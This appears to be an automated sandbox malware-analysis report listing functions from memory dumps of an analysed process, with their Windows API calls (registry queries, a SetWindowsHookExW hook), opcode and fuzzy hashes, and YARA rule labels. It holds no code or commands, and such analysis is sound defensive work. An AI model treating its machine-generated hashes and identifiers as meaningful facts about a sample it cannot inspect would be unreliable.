                                                  Uniqueness Score: -1.00%

                                                  Function 0036853C, Relevance: 2.0, APIs: 1, Instructions: 463COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: ee4bc301b1d2c895a9533272e0f2328e8770e5ee94589ede65354238dbdb4655
                                                  • Instruction ID: e80a62d5bf6a0d71e3c5352ea1cd4767708b034d741540ed170954e1a2cf5314
                                                  • Opcode Fuzzy Hash: ee4bc301b1d2c895a9533272e0f2328e8770e5ee94589ede65354238dbdb4655
                                                  • Instruction Fuzzy Hash: A8220674A04224CFCB649F70D85869CBBBABF88205F1085EAD909A7754DF349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00368578, Relevance: 2.0, APIs: 1, Instructions: 458COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 39e19aad28cf3576ba49d547dbd38c5f8e1392184b45c1123ae99427edc08d82
                                                  • Instruction ID: 81cd7af0e3ff2ffa4aba2ab031abeb60b53eff2820d91166c450330cc7d3c3c3
                                                  • Opcode Fuzzy Hash: 39e19aad28cf3576ba49d547dbd38c5f8e1392184b45c1123ae99427edc08d82
                                                  • Instruction Fuzzy Hash: C1221674A04224CFCB649F70D85869CBBBABF88205F1085EAD909A3754DF349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003685BD, Relevance: 2.0, APIs: 1, Instructions: 451COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 490733fde837789ab5077ccaeca24e51e579a29a2b11a2bfc853889680a8734b
                                                  • Instruction ID: 69e18c381bebb50dc273ea789713ec3c2473e96950574e5c97c1e0a224fe0311
                                                  • Opcode Fuzzy Hash: 490733fde837789ab5077ccaeca24e51e579a29a2b11a2bfc853889680a8734b
                                                  • Instruction Fuzzy Hash: F0221674A04224CFCB649F70D85869DBBBABF88205F1085EAD909A3754DF349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00368605, Relevance: 1.9, APIs: 1, Instructions: 444COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 9d8e40aa9d573c00834e398b231d73f546a40942ab9d80a76baeaf595847d28a
                                                  • Instruction ID: 6aa098c6e559434544c854a9e998a3b00a502a9d65a9165f6f21defdeea0dae7
                                                  • Opcode Fuzzy Hash: 9d8e40aa9d573c00834e398b231d73f546a40942ab9d80a76baeaf595847d28a
                                                  • Instruction Fuzzy Hash: 0F222674A04224CFCB649F70D85869CBBBABF88205F1085EAD909A3754DF349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00368663, Relevance: 1.9, APIs: 1, Instructions: 433COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 97e289d7c6fdb303ffc12712af8816a79c2a94fe46bbc2de2e5611ce1721de67
                                                  • Instruction ID: 100329c37e728177c81233a564d4686d3046a37ad64f6507a551d50dbdf9fa74
                                                  • Opcode Fuzzy Hash: 97e289d7c6fdb303ffc12712af8816a79c2a94fe46bbc2de2e5611ce1721de67
                                                  • Instruction Fuzzy Hash: EE121674A04224CFCB649F70D85869DBBB6BF88205F1085AAD909A3754DF349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003686AB, Relevance: 1.9, APIs: 1, Instructions: 426COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: d3fe138e55f08ca16b9f701161cd30d01b3808a6a3eac92abd0d4b425c653fe8
                                                  • Instruction ID: a7e7525e57a81cf7589f279fddf2cbca38fbd065529d69aefe9d7d77d956b575
                                                  • Opcode Fuzzy Hash: d3fe138e55f08ca16b9f701161cd30d01b3808a6a3eac92abd0d4b425c653fe8
                                                  • Instruction Fuzzy Hash: 6A121674A04224CFCB649F70D85869DBBB6BF88205F1085AAD909E3794DF349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003686F3, Relevance: 1.9, APIs: 1, Instructions: 419COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 96ec74df4697f4983f7c4587403429f6e1b0f5982ddb9257682a5802d536ba4d
                                                  • Instruction ID: ca1163740e6011a2d541f76a7cb638dcf4fe9fd44e9cce761d16e76c3be3509e
                                                  • Opcode Fuzzy Hash: 96ec74df4697f4983f7c4587403429f6e1b0f5982ddb9257682a5802d536ba4d
                                                  • Instruction Fuzzy Hash: 87122674A04224CFCB649F70D85869CBBB6BF88205F1085AAD909E3794DF349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0036873B, Relevance: 1.9, APIs: 1, Instructions: 412COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 8b5a49fbadc41cea2a36c028b87e3b1f02e3f5a79abe5e8ff25e1991d0fcd098
                                                  • Instruction ID: bf3f210f0318b60d39ef092ac185dfb007dbbb326726f5c7d663d8239240e833
                                                  • Opcode Fuzzy Hash: 8b5a49fbadc41cea2a36c028b87e3b1f02e3f5a79abe5e8ff25e1991d0fcd098
                                                  • Instruction Fuzzy Hash: 5E123674A04224CFCB649F70D95869CBBB6BF88205F1085AAD909E3794DF348EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00368783, Relevance: 1.9, APIs: 1, Instructions: 405COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: b52ad93d5e809804da156f3133e490cb5579e03677a9205b159ce428db57154d
                                                  • Instruction ID: 2933c33de9b88049665886e501122f409cb8482f73bd6e0b7f3db1b171d19f3c
                                                  • Opcode Fuzzy Hash: b52ad93d5e809804da156f3133e490cb5579e03677a9205b159ce428db57154d
                                                  • Instruction Fuzzy Hash: C8021674A04224CFCB649F70D85869DBBB6BF88205F1085AAD909E3794DF349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003687CB, Relevance: 1.9, APIs: 1, Instructions: 398COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 984d452d14f1a6321375b326a6247904dabda640a15c28862dc852d2a92e1e03
                                                  • Instruction ID: 4d344eea45f79baabbdcdf017efb008df3e5f947431158e06babe7f26a574b2e
                                                  • Opcode Fuzzy Hash: 984d452d14f1a6321375b326a6247904dabda640a15c28862dc852d2a92e1e03
                                                  • Instruction Fuzzy Hash: 140226B4A04224CFCB649F70D85869DBBB6BF88205F1085AAD909E3794DF348EC5CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00368813, Relevance: 1.9, APIs: 1, Instructions: 389COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 0ce7c3b04d424cf7b2c3d9515de1b9b9249a3fde8a7fbb6a28dbd768abb20039
                                                  • Instruction ID: 6bb222b5b2382d489910437f8b8a1b52e28a24c46a1ba6ee222a3f60b2ad4d93
                                                  • Opcode Fuzzy Hash: 0ce7c3b04d424cf7b2c3d9515de1b9b9249a3fde8a7fbb6a28dbd768abb20039
                                                  • Instruction Fuzzy Hash: 850227B4A04224CFCB649F70D95869DBBB6BF88205F1085AAD909E3794DF348EC5CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0036884F, Relevance: 1.9, APIs: 1, Instructions: 384COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 6c0deb0e2c3639c25bf170547cdc43cbd16be25c0365556fc3db3908ba323ee6
                                                  • Instruction ID: 35e4d3952e3ed5c9da19a93a420f46eb4d3543c784cdc9d5e1990db044f852e7
                                                  • Opcode Fuzzy Hash: 6c0deb0e2c3639c25bf170547cdc43cbd16be25c0365556fc3db3908ba323ee6
                                                  • Instruction Fuzzy Hash: A10228B4A04224CFCB649F70D95869DBBB6BF88205F1085AAD909E3794DF348EC5CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00368897, Relevance: 1.9, APIs: 1, Instructions: 377COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: f4902390ee520d83024514123320b3628ae1d508e7fdae65ec5d445375b60b5d
                                                  • Instruction ID: 80f31a7d109de1cba048c9a19e81ff4699a050e1ce4698a888ba6a17fe29a5e6
                                                  • Opcode Fuzzy Hash: f4902390ee520d83024514123320b3628ae1d508e7fdae65ec5d445375b60b5d
                                                  • Instruction Fuzzy Hash: 3F0227B4A04224CFCB649F70D95869DBBB6BF88205F1085AAD909E3794DF348EC5CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003688DF, Relevance: 1.9, APIs: 1, Instructions: 368COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 490b41d2469676be7c905d11c2b067d48ad20995f98d4a586061e482757ed529
                                                  • Instruction ID: 3c6bca5ba19af86b15d88ac8e3cbc229533cbb6754365c7c89b0a5ff7790cadf
                                                  • Opcode Fuzzy Hash: 490b41d2469676be7c905d11c2b067d48ad20995f98d4a586061e482757ed529
                                                  • Instruction Fuzzy Hash: AEF128B4A04224CFCB649F70D95869DBBB6BF88205F1085AAD909E3794DF348EC5CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0036891B, Relevance: 1.9, APIs: 1, Instructions: 363COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: ac78528f7a465665ecef80bf6c023a61f7d3cb1008d85f747b552fa76b095778
                                                  • Instruction ID: 1ab7cff18deda2579f675d3d6d0b117d0b2a20f450354402d0fcb173d4148494
                                                  • Opcode Fuzzy Hash: ac78528f7a465665ecef80bf6c023a61f7d3cb1008d85f747b552fa76b095778
                                                  • Instruction Fuzzy Hash: ABF128B4A04224CFCB649F70D95869DBBB6BF88205F1085AAD909E3794DF348EC5CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00368963, Relevance: 1.9, APIs: 1, Instructions: 356COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 06c96d6adbb6215ec811ebf3acb3fdf127eebc83d6a7d74c991c34d0ce1d97b9
                                                  • Instruction ID: 71026bcb9a692f6cda10d7b042a6842e599bc8efb5815055104cfd1cb829964c
                                                  • Opcode Fuzzy Hash: 06c96d6adbb6215ec811ebf3acb3fdf127eebc83d6a7d74c991c34d0ce1d97b9
                                                  • Instruction Fuzzy Hash: DAF13974A04214CFCB64AF70DD5869DBBB6AF88205F1085AAD509E3794DF348EC5CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003689AB, Relevance: 1.8, APIs: 1, Instructions: 349COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 3734b8bb8ba55ab648b4157ff2d0a888d28a050a08db6f41cdf936d7d30a850c
                                                  • Instruction ID: 63402f805ef4aace0b4c8800b1c90b78eb1e93d0b155be73b81d1dbcd54fef97
                                                  • Opcode Fuzzy Hash: 3734b8bb8ba55ab648b4157ff2d0a888d28a050a08db6f41cdf936d7d30a850c
                                                  • Instruction Fuzzy Hash: A2F13874A042248FCB64AF70DD5869DBBB6AF88305F1085AAD909E3794DF348EC5CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003689F3, Relevance: 1.8, APIs: 1, Instructions: 342COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 567c0e13ec3da125e381816adb41c71ea80bdce940604410c5ef7ec6f16299d4
                                                  • Instruction ID: 51b4118e575353ea9ae30a2cf5ac7deafab1614d3b7e85354a90dfddf5978839
                                                  • Opcode Fuzzy Hash: 567c0e13ec3da125e381816adb41c71ea80bdce940604410c5ef7ec6f16299d4
                                                  • Instruction Fuzzy Hash: 6DE14874A042248FCB64AF74DD5869DBBB6AF88201F1085AAE509E3794DF348EC5CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00368A3B, Relevance: 1.8, APIs: 1, Instructions: 335COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 3eb4cdfe4cdedb5d8c20f27c915a08a75c0a06cef0283e0eda7a9505357ecca2
                                                  • Instruction ID: e050a80eb23f12bd6941130bedc6e879b516b9a13b8feb970cac854861a8b404
                                                  • Opcode Fuzzy Hash: 3eb4cdfe4cdedb5d8c20f27c915a08a75c0a06cef0283e0eda7a9505357ecca2
                                                  • Instruction Fuzzy Hash: 9DE15874A042248FCB64AF70DD5879DBAB6AF88201F1485AAE409E3794DF348EC5CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0086BE58, Relevance: 1.6, APIs: 1, Instructions: 117registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0086BF71
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351416134.0000000000860000.00000040.00000001.sdmp, Offset: 00860000, based on PE: false
                                                  Similarity
                                                  • API ID: QueryValue
                                                  • String ID:
                                                  • API String ID: 3660427363-0
                                                  • Opcode ID: 1d424f477307ee8a39c71d8d853acc997c430a1a6cf042fa5ee684d3f6c35668
                                                  • Instruction ID: ad0bfa75a86a51a26319198de5eea1141f787674a7990cde6d7904f504a3636e
                                                  • Opcode Fuzzy Hash: 1d424f477307ee8a39c71d8d853acc997c430a1a6cf042fa5ee684d3f6c35668
                                                  • Instruction Fuzzy Hash: 1C4124B1E002489FCB10CFA9D884A9EBBF5FF48304F15846AE918EB360DB749945CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0086BEB8, Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0086BF71
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351416134.0000000000860000.00000040.00000001.sdmp, Offset: 00860000, based on PE: false
                                                  Similarity
                                                  • API ID: QueryValue
                                                  • String ID:
                                                  • API String ID: 3660427363-0
                                                  • Opcode ID: fe720b2cc356dd9303d25296183217b2c66ee7f6c518f11ad691a4988052b2e9
                                                  • Instruction ID: 901e5b87639902d8651dc4135e9dd094924bd73552dfb4256aedeb2fe5766ceb
                                                  • Opcode Fuzzy Hash: fe720b2cc356dd9303d25296183217b2c66ee7f6c518f11ad691a4988052b2e9
                                                  • Instruction Fuzzy Hash: D431CDB1D002589FCB20CF9AD884A8EBBF5FF48304F15802AE818EB314DB74A945CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0086BC00, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 0086BCB4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351416134.0000000000860000.00000040.00000001.sdmp, Offset: 00860000, based on PE: false
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: 1f53b8cc560da45f0168f7045257e259ce576b757bf6a9a12923498967d1c49c
                                                  • Instruction ID: a22286f19bc290842d59d17f035008dd3aad37d5a00dd6b7539824b47192d565
                                                  • Opcode Fuzzy Hash: 1f53b8cc560da45f0168f7045257e259ce576b757bf6a9a12923498967d1c49c
                                                  • Instruction Fuzzy Hash: FA31E1B1D012899FDB10CF99C584A8EFFF5FF48308F25816AE808AB345C7759985CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 007D30D8, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 007D3153
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351383479.00000000007D0000.00000040.00000001.sdmp, Offset: 007D0000, based on PE: false
                                                  Similarity
                                                  • API ID: HookWindows
                                                  • String ID:
                                                  • API String ID: 2559412058-0
                                                  • Opcode ID: 560e22c73d85f2e0b917089b85c34e515a45011c155aa3484371f35d4a8d0d3b
                                                  • Instruction ID: cc972e0d5f78119f4c9cb099fe1b18cdf69f0cdef1c5e0f2e4cb0b650d7838ba
                                                  • Opcode Fuzzy Hash: 560e22c73d85f2e0b917089b85c34e515a45011c155aa3484371f35d4a8d0d3b
                                                  • Instruction Fuzzy Hash: FC21E3759006099FCB14CFA9D844BEEFBF5EB88314F14842AE419A7350C779AA44CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000BD2B0, Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350620155.00000000000BD000.00000040.00000001.sdmp, Offset: 000BD000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 74efab6186023b78ae0fa0991ce32d358a93dfeeed36416f7250ad8d32bd0cb8
                                                  • Instruction ID: 1464cc2848202f9dbcefa701c50976c83eddb22b748b84a88e4dd0213d1d77cd
                                                  • Opcode Fuzzy Hash: 74efab6186023b78ae0fa0991ce32d358a93dfeeed36416f7250ad8d32bd0cb8
                                                  • Instruction Fuzzy Hash: BC213371108240EFCB15CF00D9C0B6EFFA1FB88714F24856AE9054B206D33AD816CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000BD578, Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350620155.00000000000BD000.00000040.00000001.sdmp, Offset: 000BD000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eb71e35a795681328162a296691b24e8978d8cf5b13b1bd6b5ca8533284e2407
                                                  • Instruction ID: 57a60917dbf3f3fd15a687613eb2e349034de8355840d8ab00d5df2791784ad2
                                                  • Opcode Fuzzy Hash: eb71e35a795681328162a296691b24e8978d8cf5b13b1bd6b5ca8533284e2407
                                                  • Instruction Fuzzy Hash: 23213771504244DFCB25CF14D9C0F6AFFA5FBA8328F34856AE9094B246D336D856CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001BD01C, Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350783404.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 03c23195903f6b0d8fe0fe3dad4442c268790fa5a579e4fc52a4acde91ed568e
                                                  • Instruction ID: 96f69d1874a0c9728551d681035ec9cb4e9e00160677cfc265e83fb3bf23a733
                                                  • Opcode Fuzzy Hash: 03c23195903f6b0d8fe0fe3dad4442c268790fa5a579e4fc52a4acde91ed568e
                                                  • Instruction Fuzzy Hash: 98212274608244DFCB18EF14E8C4B6ABB61EB88314F30C5A9E8094B246D33AD806CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001BD006, Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350783404.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 28845efd67e7d3bc95611b37a9f2f01918f6a6c2fe62bcf70269871ed9d63c88
                                                  • Instruction ID: 7b31b2f57fcc4e2cede6838a12e334c49e9001bba25646f4cd34a93a374ea75a
                                                  • Opcode Fuzzy Hash: 28845efd67e7d3bc95611b37a9f2f01918f6a6c2fe62bcf70269871ed9d63c88
                                                  • Instruction Fuzzy Hash: 002180755083809FCB06DF14D994B15BFB1EF46314F28C5DAD8498B267D33AD816CB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000BD2AB, Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350620155.00000000000BD000.00000040.00000001.sdmp, Offset: 000BD000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c3f26df375e99879f5e057b4afa0d19a081f3655f915fd874b313a63156f218b
                                                  • Instruction ID: dc9464e40f243f5911c630c56a662e0b05c10e18e743d9b38250ecb17688c4ec
                                                  • Opcode Fuzzy Hash: c3f26df375e99879f5e057b4afa0d19a081f3655f915fd874b313a63156f218b
                                                  • Instruction Fuzzy Hash: F721AF76504240DFCB06CF10D9C4B5AFFA1FB84714F24C5AADC044B656D33AD966CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000BD573, Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350620155.00000000000BD000.00000040.00000001.sdmp, Offset: 000BD000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 55b3960a612bb6f5a66343db9f1265847c5770086973eedfb80f94c6e709dc54
                                                  • Instruction ID: c29d93ee357587e417e44efc698a20b9bb8aba78437ed9ee9f5c86abe43af9a1
                                                  • Opcode Fuzzy Hash: 55b3960a612bb6f5a66343db9f1265847c5770086973eedfb80f94c6e709dc54
                                                  • Instruction Fuzzy Hash: 9211D376504284CFCB12CF14D5C4B56FFB1FB94324F24C5AAD8094B616D33AD856CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 00866D98, Relevance: 23.9, Strings: 18, Instructions: 1390COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351416134.0000000000860000.00000040.00000001.sdmp, Offset: 00860000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fCyl$fCyl$fCyl$fCyl$fCyl$fCyl$fCyl$fCyl$fCyl$fCyl$fCyl$fCyl$fCyl$fCyl$fCyl$fCyl$fCyl$fCyl
                                                  • API String ID: 0-1542981746
                                                  • Opcode ID: 99e7f9a6f6927fe9cb7ae7bcfa2b283f3922e4cd097fe23fd57e490f744f8801
                                                  • Instruction ID: 8c0ba93e9510ea96f65c676e05ccc703c505cfed1095528b3d5a69f8086f808f
                                                  • Opcode Fuzzy Hash: 99e7f9a6f6927fe9cb7ae7bcfa2b283f3922e4cd097fe23fd57e490f744f8801
                                                  • Instruction Fuzzy Hash: D2B27A30B002049FDB64EB74D969BAEB7F2EF85344F158569E509EB381EF30AD458B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00865B10, Relevance: 7.8, Strings: 6, Instructions: 271COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351416134.0000000000860000.00000040.00000001.sdmp, Offset: 00860000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fCyl$fCyl$fCyl$fCyl$fCyl$fCyl
                                                  • API String ID: 0-443963743
                                                  • Opcode ID: e35254711ca9f6fce89da8b1db52876f269377a709b1924e4513693abbcb44b9
                                                  • Instruction ID: 68bf8a3c862de6dff1e1d928a8531dcd694b224ae11d4557e2f24d37373cee05
                                                  • Opcode Fuzzy Hash: e35254711ca9f6fce89da8b1db52876f269377a709b1924e4513693abbcb44b9
